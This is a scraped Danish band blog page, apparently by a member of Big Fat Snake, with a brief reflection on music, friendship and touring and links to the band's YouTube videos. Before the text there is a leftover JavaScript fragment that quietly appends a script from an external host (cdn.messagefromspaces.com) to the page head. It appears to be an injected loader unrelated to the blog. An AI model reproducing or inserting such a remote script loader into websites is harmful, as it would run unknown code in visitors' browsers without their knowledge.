, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
1 person likes this post
-->
Rockbox

Det er det musik handler om.

Jeg elsker mit samvær med mine kolleger og ikke mindst store venner i Bigfatsnake.

Det er drømmen, som blev til virkelighed og mange store fællesoplevelser og ikke mindst rejser, har forstærket et utroligt sammenhold og det er en konstant glæde, at vi i orkestret til stadighed er på jagt i tonernes verden og ikke tager noget for givet. At stå i et øvelokale og mærke gruppeånd og tilmed blive beriget med musikalske udfordringer og kicks og skønne engle der kommer gennem rummet – det er det musik handler om for mig.

Her håber jeg ind i mellem at levere en historie fra før og nu – hvis nogen gider at høre den.

Big Fat Snake – Jealous Guy

 

 

 

 

 

 

                    YOUTUBE

  Big Fat Snake´s youtube kanal.

Bag Facaden – se ærlige svar på ærlige spørgsmål.


Big Fat Snake & Elvis Presley´s TCB Band


Big Fat Snake – Come Closer


 

 

Der er lukket for kommentarer.